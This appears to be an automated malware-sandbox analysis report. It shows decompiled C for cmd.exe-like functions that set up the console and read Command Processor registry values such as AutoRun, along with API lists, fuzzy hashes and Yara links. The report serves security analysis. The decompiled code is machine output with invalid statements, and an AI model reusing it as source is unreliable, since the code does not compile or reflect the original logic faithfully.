                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: DebuggerPresent
                                  • String ID:
                                  • API String ID: 1347740429-0
                                  • Opcode ID: 5fa57be5205aaea1f3401ca0d4a12b8280c775f8ae666c2d05b1184ab32286cb
                                  • Instruction ID: 0cd014f100887502a550b3df38d8dc19fd387dd845d55d26c97042c6f24b111e
                                  • Opcode Fuzzy Hash: 5fa57be5205aaea1f3401ca0d4a12b8280c775f8ae666c2d05b1184ab32286cb
                                  • Instruction Fuzzy Hash: D1F0A73061412D9B8B10AF75AD0677D37BC9B55700B55015AFC0AD7942CB74DE4657D0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00163D27, Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 299memorylibraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 67%
                                  			E00163D27(void* __ebx, intOrPtr* __ecx) {
				signed int _v8;
				char _v72;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v96;
				void* _v100;
				intOrPtr* _v104;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t26;
				void* _t29;
				void* _t30;
				WCHAR* _t36;
				intOrPtr _t57;
				WCHAR* _t59;
				int _t60;
				WCHAR* _t72;
				struct HINSTANCE__* _t76;
				intOrPtr* _t80;
				int _t88;
				WCHAR* _t89;
				WCHAR* _t91;
				void* _t95;
				void* _t98;
				short _t100;
				intOrPtr* _t109;
				WCHAR* _t113;
				short _t122;
				short* _t125;
				void* _t129;
				long _t131;
				intOrPtr* _t133;
				intOrPtr* _t134;
				void* _t135;
				void* _t136;
				void* _t137;
				signed int _t138;
				void* _t139;

				_t95 = __ebx;
				_t26 =  *0x17d0b4; // 0x3dd0c51d
				_v8 = _t26 ^ _t138;
				_t133 = __ecx;
				_v104 = __ecx;
				 *0x183858 = 0x18385c;
				InitializeCriticalSection(0x18385c);
				EnterCriticalSection( *0x183858);
				_t131 = 0;
				 *0x17d544 = 0;
				LeaveCriticalSection( *0x183858);
				_t29 = SetConsoleCtrlHandler(E00176D90, 1);
				__imp___get_osfhandle(0x18387c);
				_t30 = GetConsoleMode(_t29, 1);
				__imp___get_osfhandle(0, 0x183878);
				_pop(_t98);
				GetConsoleMode(_t30, ??);
				E001606C0(_t98);
				 *0x183834 = E00163AAE();
				 *0x183830 = E00163B2C(_t98);
				E001641DD(_t133);
				_t36 = GetCommandLineW();
				_t3 =  &(_t36[1]); // 0x2
				_t125 = _t3;
				do {
					_t100 =  *_t36;
					_t36 =  &(_t36[1]);
				} while (_t100 != 0);
				_t144 = (_t36 - _t125 >> 1) + 1 - 0x2000;
				if((_t36 - _t125 >> 1) + 1 > 0x2000) {
					_push(0);
					E0015C5A2(0x2000);
					_t103 = 0x400023df;
					do {
						__eflags = E00164B60(__eflags, 0);
					} while (__eflags == 0);
					L21:
					exit(1);
					L22:
					_push(_t131);
					E0015C5A2(_t103);
					_t103 = 0x2374;
					do {
						__eflags = E00164B60(__eflags, _t131);
					} while (__eflags == 0);
					goto L21;
				}
				_t103 =  &_v100;
				E00162A7C( &_v100, 0x2000, _t144);
				_t134 = _v100;
				if(_t134 == 0) {
					goto L22;
				}
				E00161040(_t134, 0x2000, GetCommandLineW());
				if(E00160C70(0x193ab0, ((0 |  *0x193cbc == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					_push(0);
					E0015C5A2(0x193ab0);
					_t103 = 0x2374;
					do {
						__eflags = E00164B60(__eflags, 0);
					} while (__eflags == 0);
					goto L21;
				}
				_t108 =  *0x193cb8;
				if( *0x193cb8 == 0) {
					_t108 = 0x193ab0;
				}
				E001636CB(_t95, _t108,  *0x193cc0, _t131);
				E0015CEA9();
				_t109 = _t134;
				_t129 = _t109 + 2;
				do {
					_t57 =  *_t109;
					_t109 = _t109 + 2;
					_t149 = _t57 - _t131;
				} while (_t57 != _t131);
				E0015D3F4(_v104, _t149, _t134, _t109 - _t129 >> 1);
				_t59 =  *0x193cb8;
				_t130 = 0x193ab0;
				_t113 = _t59;
				if(_t59 == 0) {
					_t113 = 0x193ab0;
				}
				_t135 = 0x5c;
				_t136 = _v100;
				if( *_t113 == _t135) {
					_t103 = _t59;
					__eflags = _t59;
					if(_t59 == 0) {
						_t103 = _t130;
					}
					_t137 = 0x5c;
					__eflags = _t103[1] - _t137;
					_t136 = _v100;
					if(_t103[1] != _t137) {
						goto L10;
					} else {
						__eflags =  *0x198528;
						if( *0x198528 != 0) {
							goto L10;
						}
						__eflags = _t59;
						if(_t59 == 0) {
							_t59 = _t130;
						}
						E0015C5A2(_t103, 0x400023c8, 1, _t59);
						_t91 =  *0x193cb8;
						_t139 = _t139 + 0xc;
						__eflags = _t91;
						if(_t91 == 0) {
							_t91 = 0x193ab0;
						}
						__eflags = GetWindowsDirectoryW(_t91,  *0x193cc0);
						if(__eflags == 0) {
							do {
								__eflags = E00164B60(__eflags, _t131);
							} while (__eflags == 0);
							goto L21;
						} else {
							_t124 =  *0x193cb8;
							__eflags =  *0x193cb8;
							if(__eflags == 0) {
								_t124 = 0x193ab0;
							}
							_t130 = 0;
							E001633FC(_t95, _t124, 0, _t131, _t136, __eflags);
							goto L10;
						}
					}
				} else {
					L10:
					_t60 = GetConsoleOutputCP();
					 *0x183854 = _t60;
					GetCPInfo(_t60, 0x183840);
					E00163F80();
					_t64 = HeapAlloc(GetProcessHeap(), _t131, 0x20c);
					 *0x183874 = _t64;
					if(_t64 != 0 && _t64 == 0) {
						_t64 =  *0x183874;
						 *( *0x183874) = 0;
					}
					if( *0x193ccc == _t131) {
						__eflags = E0016269C(_t64);
						if(__eflags == 0) {
							goto L13;
						}
						__eflags =  *0x17d5a0 - _t131; // 0x0
						if(__eflags != 0) {
							L51:
							_t122 =  *0x17d5a0; // 0x0
							E00177DF1(_t122, _t136);
							goto L13;
						}
						_t88 = GetConsoleScreenBufferInfo(GetStdHandle(0xfffffff5),  &_v96);
						__eflags = _t88;
						if(_t88 == 0) {
							_t89 =  *0x17d5a0; // 0x0
						} else {
							_t89 = _v96.wAttributes;
							 *0x17d5a0 = _t89;
						}
						__eflags = _t89;
						if(__eflags == 0) {
							goto L13;
						} else {
							goto L51;
						}
					} else {
						L13:
						if( *((intOrPtr*)(_v104 + 8)) == _t131) {
							_v100 = E00176456(__eflags);
							E0015443C( &_v72);
							E0015C108( &_v72, 0x2350, 1,  &_v72);
							E001625D9(L"\r\n");
							_t72 = _v100;
							__eflags = _t72;
							if(_t72 == 0) {
								_push(_t131);
								_push(8);
								E0015C5A2( &_v72);
							} else {
								_push(_t72);
								E001625D9(L"%s");
								E001625D9(L"\r\n");
							}
							GlobalFree(_v100);
						}
						_t76 = GetModuleHandleW(L"KERNEL32.DLL");
						 *0x17d0d0 = _t76;
						 *0x18388c = GetProcAddress(_t76, "CopyFileExW");
						GetProcAddress( *0x17d0d0, "IsDebuggerPresent");
						 *0x183888 = GetProcAddress( *0x17d0d0, "SetConsoleInputExeNameW");
						_t80 = _v104;
						if( *_t80 != _t131 ||  *((intOrPtr*)(_t80 + 4)) != _t131 ||  *((intOrPtr*)(_t80 + 8)) != _t131) {
							_t131 = 1;
						}
						__imp__??_V@YAXPAX@Z();
						return E00166FD0(_t131, _t95, _v8 ^ _t138, _t130, _t131, _t136, _t136);
					}
				}
			}








































                                  0x00163d27
                                  0x00163d2f
                                  0x00163d36
                                  0x00163d3f
                                  0x00163d43
                                  0x00163d46
                                  0x00163d4b
                                  0x00163d57
                                  0x00163d63
                                  0x00163d65
                                  0x00163d6b
                                  0x00163d78
                                  0x00163d85
                                  0x00163d8d
                                  0x00163d99
                                  0x00163d9f
                                  0x00163da1
                                  0x00163da7
                                  0x00163db1
                                  0x00163dbd
                                  0x00163dc2
                                  0x00163dc7
                                  0x00163dcd
                                  0x00163dcd
                                  0x00163dd0
                                  0x00163dd0
                                  0x00163dd3
                                  0x00163dd6
                                  0x00163de5
                                  0x00163de7
                                  0x0016e043
                                  0x0016e049
                                  0x0016e04f
                                  0x0016e050
                                  0x0016e056
                                  0x0016e056
                                  0x0016e05a
                                  0x0016e05c
                                  0x0016e062
                                  0x0016e062
                                  0x0016e068
                                  0x0016e06e
                                  0x0016e06f
                                  0x0016e075
                                  0x0016e075
                                  0x00000000
                                  0x0016e079
                                  0x00163def
                                  0x00163df2
                                  0x00163df7
                                  0x00163dfc
                                  0x00000000
                                  0x00000000
                                  0x00163e10
                                  0x00163e38
                                  0x0016e07b
                                  0x0016e081
                                  0x0016e087
                                  0x0016e088
                                  0x0016e08e
                                  0x0016e08e
                                  0x00000000
                                  0x0016e092
                                  0x00163e3e
                                  0x00163e46
                                  0x0016e094
                                  0x0016e094
                                  0x00163e53
                                  0x00163e58
                                  0x00163e5d
                                  0x00163e5f
                                  0x00163e62
                                  0x00163e62
                                  0x00163e65
                                  0x00163e68
                                  0x00163e68
                                  0x00163e76
                                  0x00163e7b
                                  0x00163e80
                                  0x00163e85
                                  0x00163e89
                                  0x0016e09e
                                  0x0016e09e
                                  0x00163e91
                                  0x00163e95
                                  0x00163e98
                                  0x0016e0a5
                                  0x0016e0a7
                                  0x0016e0a9
                                  0x0016e0ab
                                  0x0016e0ab
                                  0x0016e0af
                                  0x0016e0b0
                                  0x0016e0b4
                                  0x0016e0b7
                                  0x00000000
                                  0x0016e0bd
                                  0x0016e0bd
                                  0x0016e0c4
                                  0x00000000
                                  0x00000000
                                  0x0016e0ca
                                  0x0016e0cc
                                  0x0016e0ce
                                  0x0016e0ce
                                  0x0016e0d8
                                  0x0016e0dd
                                  0x0016e0e2
                                  0x0016e0e5
                                  0x0016e0e7
                                  0x0016e0e9
                                  0x0016e0e9
                                  0x0016e0fb
                                  0x0016e0fd
                                  0x0016e11a
                                  0x0016e120
                                  0x0016e120
                                  0x00000000
                                  0x0016e0ff
                                  0x0016e0ff
                                  0x0016e105
                                  0x0016e107
                                  0x0016e109
                                  0x0016e109
                                  0x0016e10e
                                  0x0016e110
                                  0x00000000
                                  0x0016e110
                                  0x0016e0fd
                                  0x00163e9e
                                  0x00163e9e
                                  0x00163e9e
                                  0x00163eaa
                                  0x00163eaf
                                  0x00163eb5
                                  0x00163ec7
                                  0x00163ecd
                                  0x00163ed4
                                  0x0016e129
                                  0x0016e130
                                  0x0016e130
                                  0x00163ef0
                                  0x0016e140
                                  0x0016e142
                                  0x00000000
                                  0x00000000
                                  0x0016e148
                                  0x0016e14f
                                  0x0016e183
                                  0x0016e183
                                  0x0016e189
                                  0x00000000
                                  0x0016e189
                                  0x0016e15e
                                  0x0016e164
                                  0x0016e166
                                  0x0016e174
                                  0x0016e168
                                  0x0016e168
                                  0x0016e16c
                                  0x0016e16c
                                  0x0016e17a
                                  0x0016e17d
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00163ef6
                                  0x00163ef6
                                  0x00163efc
                                  0x0016e19b
                                  0x0016e19e
                                  0x0016e1ae
                                  0x0016e1b8
                                  0x0016e1bd
                                  0x0016e1c3
                                  0x0016e1c5
                                  0x0016e1e1
                                  0x0016e1e2
                                  0x0016e1e4
                                  0x0016e1c7
                                  0x0016e1c7
                                  0x0016e1cd
                                  0x0016e1d7
                                  0x0016e1dc
                                  0x0016e1ef
                                  0x0016e1ef
                                  0x00163f07
                                  0x00163f13
                                  0x00163f29
                                  0x00163f2e
                                  0x00163f45
                                  0x00163f4a
                                  0x00163f4f
                                  0x00163f5d
                                  0x00163f5d
                                  0x00163f5f
                                  0x00163f77
                                  0x00163f77
                                  0x00163ef0

                                  APIs
                                  • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(0018385C), ref: 00163D4B
                                  • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00163D57
                                  • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00163D6B
                                  • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(00176D90,00000001), ref: 00163D78
                                  • _get_osfhandle.MSVCRT ref: 00163D85
                                  • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00163D8D
                                  • _get_osfhandle.MSVCRT ref: 00163D99
                                  • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00163DA1
                                    • Part of subcall function 001606C0: _get_osfhandle.MSVCRT ref: 001606D8
                                    • Part of subcall function 001606C0: SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,001738A5), ref: 001606E2
                                    • Part of subcall function 001606C0: _get_osfhandle.MSVCRT ref: 001606EF
                                    • Part of subcall function 001606C0: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 001606F9
                                    • Part of subcall function 001606C0: _get_osfhandle.MSVCRT ref: 0016071E
                                    • Part of subcall function 001606C0: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00160728
                                    • Part of subcall function 001606C0: _get_osfhandle.MSVCRT ref: 00160750
                                    • Part of subcall function 001606C0: SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 0016075A
                                    • Part of subcall function 00163AAE: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,00163A9F), ref: 00163AB2
                                    • Part of subcall function 00163AAE: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 00163ACD
                                    • Part of subcall function 00163AAE: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00163AD4
                                    • Part of subcall function 00163AAE: memcpy.MSVCRT ref: 00163AE3
                                    • Part of subcall function 00163AAE: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 00163AEC
                                    • Part of subcall function 00163B2C: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000004,?,00163DBB), ref: 00163B33
                                    • Part of subcall function 00163B2C: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00163DBB), ref: 00163B3A
                                    • Part of subcall function 001641DD: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Command Processor,00000000,02000000,?), ref: 0016423D
                                    • Part of subcall function 001641DD: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DisableUNCCheck,00000000,?,?,?), ref: 0016427D
                                    • Part of subcall function 001641DD: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,EnableExtensions,00000000,00000001,?,00001000), ref: 001642B7
                                    • Part of subcall function 001641DD: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DelayedExpansion,00000000,00000001,?,00001000), ref: 00164307
                                    • Part of subcall function 001641DD: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DefaultColor,00000000,00000001,?,00001000), ref: 00164341
                                  • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00163DC7
                                  • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00163E02
                                  • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,-00000105,00000000), ref: 00163E9E
                                  • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00183840), ref: 00163EAF
                                  • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,0000020C), ref: 00163EC0
                                  • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00163EC7
                                  • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000104), ref: 00163EDC
                                  • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(KERNEL32.DLL), ref: 00163F07
                                  • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,CopyFileExW), ref: 00163F18
                                  • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(IsDebuggerPresent), ref: 00163F2E
                                  • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(SetConsoleInputExeNameW), ref: 00163F3F
                                  • ??_V@YAXPAX@Z.MSVCRT ref: 00163F5F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: Console$HeapMode_get_osfhandle$QueryValue$AddressAllocCriticalProcProcessSection$CommandEnvironmentLineStrings$CtrlEnterFreeHandleHandlerInfoInitializeLeaveModuleOpenOutputTitlememcpy
                                  • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                  • API String ID: 570592814-3021193919
                                  • Opcode ID: ebd160e5f3eea39e08e46e486ee88217526e4f9ee17146d27dcf4b95b5b13157
                                  • Instruction ID: 809a8e2b606ea6a6beff0ae33ffd1f6a0e4b6e017e35c5d8c76a61d56de82e07
                                  • Opcode Fuzzy Hash: ebd160e5f3eea39e08e46e486ee88217526e4f9ee17146d27dcf4b95b5b13157
                                  • Instruction Fuzzy Hash: F2A1F731B00300EBDB14ABB9EC0AA6E37B5FB95701B14411EF926DB591EB719ED1CB21
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001641DD, Relevance: 45.8, APIs: 18, Strings: 8, Instructions: 311registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 74%
                                  			E001641DD(intOrPtr* __ecx) {
				signed int _v8;
				char _v4100;
				long _v4104;
				int _v4108;
				int _v4112;
				void* _v4116;
				intOrPtr _v4120;
				intOrPtr _v4124;
				char _v4128;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t85;
				int _t88;
				long _t97;
				long _t114;
				long _t127;
				long _t130;
				wchar_t* _t131;
				wchar_t* _t135;
				wchar_t* _t139;
				void* _t144;
				long _t146;
				void* _t151;
				long _t152;
				void* _t153;
				signed int _t159;
				intOrPtr* _t162;
				intOrPtr _t163;
				signed int _t166;
				void* _t167;
				void* _t189;

				E00168290(0x101c);
				_t85 =  *0x17d0b4; // 0x3dd0c51d
				_v8 = _t85 ^ _t166;
				_t162 = __ecx;
				_v4128 = 0x80000002;
				_v4124 = 0x80000001;
				_t163 = 2;
				 *0x193cc9 = 1;
				_t144 =  &_v4128 - __ecx;
				_v4120 = _t163;
				while(1) {
					_t88 = RegOpenKeyExW( *(_t144 + _t162), L"Software\\Microsoft\\Command Processor", 0, 0x2000000,  &_v4116);
					if(_t88 != 0) {
						goto L33;
					}
					_v4108 = _v4108 & _t88;
					_v4112 = 0x1000;
					if(RegQueryValueExW(_v4116, L"DisableUNCCheck", 0,  &_v4108,  &_v4104,  &_v4112) == 0) {
						if(_v4108 != 4) {
							if(_v4108 == 1) {
								_t139 =  &_v4104;
								__imp___wtol(_t139);
								asm("sbb al, al");
								 *0x198528 =  ~(_t139 - 1) + 1;
							}
						} else {
							 *0x198528 = _v4104 != 0;
						}
					}
					_v4112 = 0x1000;
					_t97 = RegQueryValueExW(_v4116, L"EnableExtensions", 0,  &_v4108,  &_v4104,  &_v4112);
					if(_t97 == 0) {
						if(_v4108 != 4) {
							if(_v4108 == 1) {
								_t135 =  &_v4104;
								__imp___wtol(_t135);
								asm("sbb al, al");
								 *0x193cc9 =  ~(_t135 - 1) + 1;
							}
						} else {
							 *0x193cc9 = _v4104 != _t97;
						}
					}
					_v4112 = 0x1000;
					if(RegQueryValueExW(_v4116, L"DelayedExpansion", 0,  &_v4108,  &_v4104,  &_v4112) == 0) {
						if(_v4108 != 4) {
							if(_v4108 == 1) {
								_t131 =  &_v4104;
								__imp___wtol(_t131);
								asm("sbb al, al");
								 *0x193cc8 =  ~(_t131 - 1) + 1;
							}
						} else {
							 *0x193cc8 = _v4104 != 0;
						}
					}
					_v4112 = 0x1000;
					if(RegQueryValueExW(_v4116, L"DefaultColor", 0,  &_v4108,  &_v4104,  &_v4112) != 0) {
						L11:
						_v4112 = 0x1000;
						if(RegQueryValueExW(_v4116, L"CompletionChar", 0,  &_v4108,  &_v4104,  &_v4112) != 0) {
							L19:
							_v4112 = 0x1000;
							if(RegQueryValueExW(_v4116, L"PathCompletionChar", 0,  &_v4108,  &_v4104,  &_v4112) != 0) {
								_t114 =  *0x17d0d4; // 0x20
								0x800 = 0x20;
								L27:
								_t146 =  *0x17d0d8; // 0x20
								if(_t146 != 0x800) {
									L29:
									if(_t189 == 0 && _t146 < 0x800) {
										 *0x17d0d4 = _t146;
									}
									L31:
									_v4112 = 0x1000;
									if(RegQueryValueExW(_v4116, L"AutoRun", 0,  &_v4108,  &_v4104,  &_v4112) == 0) {
										if(_v4108 == 2) {
											_t159 = _v4112 >> 1;
											_t165 =  &_v4100 + _t159 * 2;
											if(ExpandEnvironmentStringsW( &_v4104,  &_v4100 + _t159 * 2, 0x7fe - _t159) == 0) {
												_v4104 = 0;
											} else {
												E00161040( &_v4104, 0x800, _t165);
											}
											_t163 = _v4120;
										}
										if(_v4104 != 0) {
											 *_t162 = E0015DF40( &_v4104);
										}
									}
									_t88 = RegCloseKey(_v4116);
									goto L33;
								}
								_t189 = _t114 - 0x800;
								if(_t189 < 0) {
									 *0x17d0d8 = _t114;
									goto L31;
								}
								goto L29;
							}
							if(_v4108 != 4) {
								if(_v4108 != 1) {
									_t114 =  *0x17d0d4; // 0x20
									goto L23;
								}
								_t114 = wcstol( &_v4104, 0, 0);
								_t167 = _t167 + 0xc;
								goto L22;
							} else {
								_t114 = _v4104;
								L22:
								 *0x17d0d4 = _t114;
								L23:
								if(_t114 == 0) {
									0x800 = 0x20;
									L26:
									_t114 = 0x800;
									 *0x17d0d4 = 0x800;
									goto L27;
								}
								_t151 = 0xd;
								0x800 = 0x20;
								if(_t114 == _t151 || _t114 > 0x800) {
									goto L26;
								} else {
									goto L27;
								}
							}
						}
						if(_v4108 != 4) {
							if(_v4108 != 1) {
								_t127 =  *0x17d0d8; // 0x20
								goto L15;
							}
							_t127 = wcstol( &_v4104, 0, 0);
							_t167 = _t167 + 0xc;
							goto L14;
						} else {
							_t127 = _v4104;
							L14:
							 *0x17d0d8 = _t127;
							L15:
							if(_t127 == 0) {
								_t152 = 0x20;
								L18:
								 *0x17d0d8 = _t152;
								goto L19;
							}
							_t153 = 0xd;
							_t152 = 0x20;
							if(_t127 == _t153 || _t127 > _t152) {
								goto L18;
							} else {
								goto L19;
							}
						}
					} else {
						if(_v4108 != 4) {
							if(_v4108 != 1) {
								goto L11;
							}
							_t130 = wcstol( &_v4104, 0, 0);
							_t167 = _t167 + 0xc;
							goto L10;
						} else {
							_t130 = _v4104;
							L10:
							 *0x17d5a0 = _t130;
							goto L11;
						}
					}
					L33:
					_t162 = _t162 + 4;
					_t163 = _t163 - 1;
					_v4120 = _t163;
					if(_t163 == 0) {
						__imp__time();
						srand(_t88);
						return E00166FD0(_t88, _t144, _v8 ^ _t166, 0x800, _t162, _t163, 0);
					}
				}
			}



































                                  0x001641e7
                                  0x001641ec
                                  0x001641f3
                                  0x001641fb
                                  0x001641fd
                                  0x0016420d
                                  0x00164217
                                  0x00164218
                                  0x0016421f
                                  0x00164221
                                  0x00164227
                                  0x0016423d
                                  0x00164245
                                  0x00000000
                                  0x00000000
                                  0x0016424b
                                  0x0016425e
                                  0x00164285
                                  0x0016e517
                                  0x0016e533
                                  0x0016e539
                                  0x0016e540
                                  0x0016e54a
                                  0x0016e54e
                                  0x0016e54e
                                  0x0016e519
                                  0x0016e520
                                  0x0016e520
                                  0x0016e517
                                  0x00164291
                                  0x001642b7
                                  0x001642bf
                                  0x001642c8
                                  0x0016e55f
                                  0x0016e565
                                  0x0016e56c
                                  0x0016e576
                                  0x0016e57a
                                  0x0016e57a
                                  0x001642ce
                                  0x001642d4
                                  0x001642d4
                                  0x001642c8
                                  0x001642e1
                                  0x0016430f
                                  0x0016e58b
                                  0x0016e5a7
                                  0x0016e5ad
                                  0x0016e5b4
                                  0x0016e5be
                                  0x0016e5c2
                                  0x0016e5c2
                                  0x0016e58d
                                  0x0016e594
                                  0x0016e594
                                  0x0016e58b
                                  0x0016431b
                                  0x00164349
                                  0x00164365
                                  0x0016436b
                                  0x00164399
                                  0x001643d5
                                  0x001643db
                                  0x00164409
                                  0x0016e65c
                                  0x0016e664
                                  0x0016444a
                                  0x0016444a
                                  0x00164454
                                  0x00164463
                                  0x00164463
                                  0x001644f0
                                  0x001644f0
                                  0x0016446e
                                  0x00164474
                                  0x001644a2
                                  0x0016e67c
                                  0x0016e68a
                                  0x0016e69a
                                  0x0016e6a7
                                  0x0016e6be
                                  0x0016e6a9
                                  0x0016e6b5
                                  0x0016e6b5
                                  0x0016e6c5
                                  0x0016e6c5
                                  0x0016e6d3
                                  0x0016e6e4
                                  0x0016e6e4
                                  0x0016e6d3
                                  0x001644ae
                                  0x00000000
                                  0x001644ae
                                  0x0016445a
                                  0x0016445d
                                  0x0016e66a
                                  0x00000000
                                  0x0016e66a
                                  0x00000000
                                  0x0016445d
                                  0x00164416
                                  0x0016e62e
                                  0x0016e649
                                  0x00000000
                                  0x0016e649
                                  0x0016e63b
                                  0x0016e641
                                  0x00000000
                                  0x0016441c
                                  0x0016441c
                                  0x00164423
                                  0x00164423
                                  0x00164429
                                  0x0016442c
                                  0x0016e656
                                  0x00164442
                                  0x00164442
                                  0x00164444
                                  0x00000000
                                  0x00164444
                                  0x00164434
                                  0x00164437
                                  0x0016443b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0016443b
                                  0x00164416
                                  0x001643a2
                                  0x0016e5f9
                                  0x0016e614
                                  0x00000000
                                  0x0016e614
                                  0x0016e606
                                  0x0016e60c
                                  0x00000000
                                  0x001643a8
                                  0x001643a8
                                  0x001643af
                                  0x001643af
                                  0x001643b5
                                  0x001643b8
                                  0x0016e621
                                  0x001643ce
                                  0x001643ce
                                  0x00000000
                                  0x001643ce
                                  0x001643c0
                                  0x001643c6
                                  0x001643c7
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x001643c7
                                  0x0016434b
                                  0x00164352
                                  0x0016e5d3
                                  0x00000000
                                  0x00000000
                                  0x0016e5e4
                                  0x0016e5ea
                                  0x00000000
                                  0x00164358
                                  0x00164358
                                  0x0016435f
                                  0x0016435f
                                  0x00000000
                                  0x0016435f
                                  0x00164352
                                  0x001644b4
                                  0x001644b4
                                  0x001644b7
                                  0x001644ba
                                  0x001644c0
                                  0x001644c8
                                  0x001644cf
                                  0x001644e7
                                  0x001644e7
                                  0x001644c0

                                  APIs
                                  • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Command Processor,00000000,02000000,?), ref: 0016423D
                                  • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DisableUNCCheck,00000000,?,?,?), ref: 0016427D
                                  • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,EnableExtensions,00000000,00000001,?,00001000), ref: 001642B7
                                  • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DelayedExpansion,00000000,00000001,?,00001000), ref: 00164307
                                  • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DefaultColor,00000000,00000001,?,00001000), ref: 00164341
                                  • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,CompletionChar,00000000,00000001,?,00001000), ref: 00164391
                                  • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,PathCompletionChar,00000000,00000001,?,00001000), ref: 00164401
                                  • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,AutoRun,00000000,00000004,?,00001000), ref: 0016449A
                                  • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 001644AE
                                  • time.MSVCRT ref: 001644C8
                                  • srand.MSVCRT ref: 001644CF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: QueryValue$CloseOpensrandtime
                                  • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                  • API String ID: 145004033-3846321370
                                  • Opcode ID: 65eef20bf7352bd3fde7c392adc515b7efa19e22a2ce5b0d08f503169d0a7fdc
                                  • Instruction ID: 66a6b0cbd27b739d16f5c270b68d0f793ae3ead5606b849570600f47ddc628e3
                                  • Opcode Fuzzy Hash: 65eef20bf7352bd3fde7c392adc515b7efa19e22a2ce5b0d08f503169d0a7fdc
                                  • Instruction Fuzzy Hash: 23C182399002A8EBDF328B10DD45BE977B8FB18702F1041DBE589A2590DBB05ED9CF55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001765A0, Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 430fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 52%
